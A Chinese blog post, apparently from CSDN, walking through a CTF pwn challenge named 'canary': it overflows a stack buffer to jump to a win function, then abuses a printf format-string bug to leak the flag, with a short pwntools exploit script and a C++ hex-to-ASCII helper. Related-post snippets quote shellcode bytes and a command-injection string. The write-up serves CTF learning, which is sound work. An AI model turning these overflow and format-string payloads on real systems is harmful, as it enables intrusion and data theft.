ROIS冬令营———canary

已于 2023-02-19 09:50:35 修改
阅读量89 收藏
点赞数
分类专栏: pwn 文章标签: 安全
于 2023-02-19 00:32:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzucaicai/article/details/129106476
版权

题目自取

链接:https://pan.baidu.com/s/1m8PK-A-7Oaqduxk7Pxucnw?pwd=cdf5 
提取码:cdf5

开始:

首先放到IDA查看基本情况

有个很明显的栈溢出漏洞,再去看看程序的具体保护情况

 基本情况就是32位程序,开了canary保护,nx保护(不能写入shellcode),然后没开pie
我第一时间想到的就是去泄露canary,然后完成rop得到shell
不过这里有一个特别让我疑惑的点,就是保护措施明明打开了canary保护,但是我反汇编出来的vuln函数居然没有canary的检查,就直接ret返回了

好吧,既然没有那岂不是更容易了,于是我就准备system+/bin/sh了
但是gdb里发现居然没有system的plt表的地址,然后一看原来是静态编译,那没事了
静态编译就更好办了,直接ROPgadget开起来,构造如下图即可(这当然是一种方法)
   
不过很不走运,在IDA里,并没有找到/bin/sh字符串,这希望也破灭了。

不过再仔细看看有个win函数。我们打开看看

这分明就是一个后门函数啊。
基本逻辑就是v4读入flag,再把v4的内容读65个字节给v3(应该就是把flag给v3),然后让用户手动输入v2,然后重点来了,很明显的格式化字符串漏洞‘printf(v2,v1)’,而v2正是我们可以操控的。于是结合前面的vuln栈溢出漏洞,我们可以覆盖返回地址为win函数的地址,从而完成跳转到win函数,因为v3是在栈上,且读入了flag,那么我们的思路就是通过格式化字符串漏洞去泄露出flag
 

这里我们反汇编一下win函数

 如果只是单纯根据IDA给的栈位置v3位置位于esp+0x1b的话,其实是错的,可以很明显看到esp实际上一直在变动,所以通过综合判断,应该开始于第是十个参数,那接下来就是泄露啦,过程有点繁琐,就是不停地给v2读入%k$p获得对应的字符串

exp如下

from pwn import *
elf = ELF('./canary')
io =remote("81.68.85.214",8007)

context(os="linux", arch="i386",log_level="debug") 
from LibcSearcher import *

io.recv()
payload=b'a'*28+p32(elf.symbols['win'])
io.sendline(payload)

payload=b'%10$p%11$p'
io.sendline(payload)

io.recv()
io.interactive()

 其中给v2的payload要重复好多次才能完全把flag泄露
 

这里上传我写的c++代码,用于转换地址为对应阿斯克码字母的
 


#include <iostream>
#include <cstdio>
#include <cmath>
#include <cstring>
#include <sstream>
using namespace std;
long long str_int(string str);
int weishu(long long num);
void shuchu(int ws, long long num);
int main()
{
	string str;
	cin >> str;
	long long num;
	num= str_int(str);
	printf("%x\n", num);
	printf("%d\n", weishu(num));
	shuchu(weishu(num), num);
	return 0;

}

int weishu(long long num)
{
	int ws = 0;
	for (int i = 0; num > 0; i++)
	{
		num = num / 16;
		ws++;
	}
	return ws;
}

long long str_int(string str)
{
	long long num = 0;
	long long len;
	len = str.length();
	for (int i = 2; i < len; i++) {
		if (str[i] >= '0' && str[i] <= '9')
			num = num * 16 + str[i] - '0';
		else if (str[i] >= 'A' && str[i] <= 'F')
			num = num * 16 + str[i] - 'A' + 10;
		else if (str[i] >= 'a' && str[i] <= 'f')
			num = num * 16 + str[i] - 'a' + 10;
	}
	return num;
}

void shuchu(int ws, long long num)
{
	std::stringstream char_stream;
	for (int i = 0; i < 8; i++) {
		char_stream << char((num >> (8 * i)) & 0xff);
	}
	std::string char_string = char_stream.str();

	// Print the result
	std::cout << "The string representation of the hexadecimal number is: " << char_string << std::endl;

}


转换为字符的十六进制数的八位构成。最终,我们可以使用该字符串,例如打印或在程序中使用该字符串。

把每一次泄露出来的地址都放到里面跑一下,就拿到flag啦!

cccsl_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Python,OpenCV制作图像Mask——截取ROIs及构建透明的叠加层
qq_40985985的博客
07-04 3215
这篇博客将介绍如何使用OpenCV制作Mask图像掩码。使用位运算和图像掩码让我们只关注图像中感兴趣的部分。截取出任意区域的ROIs
PyTorch深度学习实战(19)——从零开始实现R-CNN目标检测
盼小辉丶的博客
10-07 2796
R-CNN (Region-based Convolutional Neural Network) 是 R-CNN 系列目标检测算法的初代模型,其将“深度学习”和传统的“计算机视觉”的相结合,在深度学习的框架下实现了高效的物体检测和识别。R-CNN 的核心思想是将目标检测任务分解为候选区域提取、特征提取、目标分类和边界框回归四个步骤。R-CNN 中的 “Region-based” 指的就是区域提议(候选区域),用于在图像中识别对象。在本节中,我们将利用区域提议来完成图像中目标对象的检测和定位。
ROIS冬令营——format4
fzucaicai的博客
02-22 94
我们可以观察到0x7fffffffdec8这块地址指向的是返回地址的下一地址,我们可以泄露这个地址再减去0x8,就可以得到返回地址处的地址,在这里也就是0x7fffffffdda8。这里要说明的是返回地址的时候返回的是base+0x951,是0x951而不是0x950,应该是栈对齐的原因,如果用ROPgadget拿到ret的地址,在返回后门函数前加一个ret应该也能够解决问题。大致思路是修改返回地址为后门函数,也就是 把rbp的下一个地址(main+46)处修改为backdoor的地址。
ROIS冬令营——typop
fzucaicai的博客
02-20 83
正是输出读入的buf变量,而且用的是%s输出,而%s的特点正是一直输出,直到遇到/x00/x00,而canary的值的特点正是最后两个字节为00,而又因为小端序,所以00对应的/x00/x00就被提到了最高位,会造成输出截断,因此我们可以选择输入11个b'a',刚好覆盖掉/x00/x00,这样就可以输出canary了,但是因为不遇到/x00/x00不会停止,所以也会把rbp的地址所指向的值也一并输出,不过问题不大。事实证明我们的 代码是正确的,那么得到了canary的地址,接下来就是libc的基地址了。
ROIS冬令营——database_in
fzucaicai的博客
02-21 100
shellcode:"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"(菜得要死,直接网上找,不要学我)拿到canary和rbp后,就可以通过栈溢出执行shellcode啦,但是我们注意到,由于shellcode太长,栈溢出太短,因此我们可以把shellcode放在栈中,在溢出的返回地址处写入返回到shellcode的地方。个人习惯先checksec再IDA。
ROIS冬令营——database
fzucaicai的博客
02-20 73
函数的意思是从标准输入中读入最多32个字节的数据,从标准输入读取一个字节,如果小于等于 0 则说明读取失败,返回 -1(0xFFFFFFFF).如果读取到换行符 ,将换行符替换为字符串0,则返回-1,就会停止。' 意思就是分两次执行,如输入 echo hello world && cat flag,它的意思就是执行system('echo hello world') system('cat flag')变量中的字符串作为参数,将它们合并成一个新的字符串,最后将结果存储到。
ROIS冬令营——format3(把bss段数据移至栈上)
fzucaicai的博客
02-19 66
漏洞是非常明显的,有格式化字符串漏洞,就是要改key的值为2023,但是发现key的值不在栈上,因此我们不能直接用输入%n来修改栈上的数据,而是要把key这个数据的地址放到栈中,然后进行修改。可以看到key变量在bss区,地址是0x60208c。那么我们的思路就是把bss段key的地址移至栈上,然后修改key的值。链接:https://pan.baidu.com/s/10SyKe0s9cyY6kiblH2fs8Q?先往第八个参数写入数据2023(因为我们将把key的地址放在第8个参数,rsp是第6个参数)
2021 rois暑假集训——栈溢出与简单的rop链(buuctf练习)
weixin_56780239的博客
08-07 1201
2021年暑假参加集训,在buuctf上做的几道题的writeup.
cuda——nms
xiaohu的博客
08-07 777
cuda——nms
软路由rois
07-27
安装于破解方法:2个ISO分别刻盘(虚拟机无视该步骤), 先安装官方原版mikrotik-5.24.iso, 再用破解光盘启动HunterTik-v2.3.1.iso, 一路回车,搞定。。。... (如果以前是安装过HunterTik-v2.3.1.iso破解的(5.22-...
Measure_ROIs:ImageJ宏
05-08
设置了“测量投资回报率”宏 •这组宏用于定义图像上的关注区域并测量其特征(区域,强度...)。 工作流程分为两部分。 它允许您通过三种不同的方法为给定通道上的所有图像生成感兴趣的特征的归类ROI。...
roisin-spring:用于分析临床数据的 Roisin Web 应用程序
06-05
Roisin Spring 是一个专门设计用于分析临床数据的Web应用程序,它基于Java技术栈构建,能够帮助用户处理、存储和分析医疗领域的大数据。这个项目的核心是Spring框架,一个广泛使用的Java企业级应用开发框架,提供了...
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
02-21
Predicting cortical ROIs via joint modeling of anatomical and connectional profiles
ENVI遥感图像处理实验二——图像常规处理2.docx
04-04
此外,可以利用Overlay选项中的Region of Interest和Basic Tools下的Subset data via ROIs功能,或者在New Display中查看裁剪结果。 接下来是图像镶嵌,这是将多张覆盖相邻地区的图像拼接成一个完整图像的过程。...
捷配总结的SMT工厂安全防静电规则
最新发布
tyymm的博客
07-17 585
SMT工厂须熟记的安全防静电规则! 安全对于我们非常重要,特别是我们这种SMT加工厂,通常我们所讲的安全是指人身安全。 但这里我们须树立一个较为全面的安全常识就是在强调人身安全的同时亦必须注意设备、产品的安全。 电气: 怎样预防人身触电事故? 1、发现有损坏的开关,电线等电气安全隐患,赶快向有关人员报告处理。2、不懂电气技术的人对电气设备不要乱装、乱拆。3、不要用湿手、湿脚动用电气设备(如: 按开关、按钮)。4、清扫卫生时,不要用湿抹布擦电线、开关按钮,一定要搞卫生,请先断开电
OWASP 移动应用 2024 十大安全风险
shendong70的博客
07-14 1260
随着智能手机的快速发展,移动应用已经成为我们日常生活关系最密切的软件应用。开放全球应用程序安全项目(OWASP)基金会,致力于提高软件的安全性。自 2014、2016年发布了移动应用的十大风险后,今年再次发布2024版。这对移动应用软件的检查工具有着重要的指导作用。
python安全脚本开发简单思路
zhugedali_的博客
07-15 535
定制化报警策略:根据不同的安全事件类型和严重程度,制定个性化的报警策略,包括报警方式(邮件、短信、即时通讯、声光报警等)、接收人员(技术团队、管理层、相关业务部门)、报警内容(事件详情、影响评估、建议措施)。- 详细的错误日志记录:当捕获到异常时,记录详细的错误信息,包括错误类型、错误消息、发生时间、相关的上下文信息(如函数参数、变量值),以便后续的故障排查和分析。- 多层级的异常捕获:在不同的代码层次(函数级别、模块级别、主程序级别)设置异常捕获机制,确保能够捕获和处理各种类型的异常。
浅谈安数云智能安全运营管理平台:DCS-SOAR
2401_82472120的博客
07-15 860
安数云DCS-SOAR平台致力于解决用户云上资产的安全运营问题,面对用户防护设备繁杂臃肿、安全事件难以及时响应、运营成本逐年上升的困境,安数云DCS-SOAR平台以安全大脑驱动为核心,建立运营体系,通过OneStep框架实现第三方安全产品的“无门槛接入、低门槛纳管”;威胁和告警数量不断增长,资源又不足以应对所有问题,在日常运营中,分析人员需要快速决定哪些告警需要处理,哪些可以忽略,但由于超负荷工作,很可能错过真正的威胁,在应对威胁和恶意攻击时出现误判,最终使网络及数据产生安全泄露,造成无可挽回的损失。
subset data from rois
09-18
Subset data from rois是指从感兴趣区域(ROIs)中获取子集数据。ROIs是指在数据集中定义的特定区域,可能是在图像、地图、生物学等领域中使用的感兴趣区域。 获取ROIs的子集数据通常涉及以下步骤: 首先,我们...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值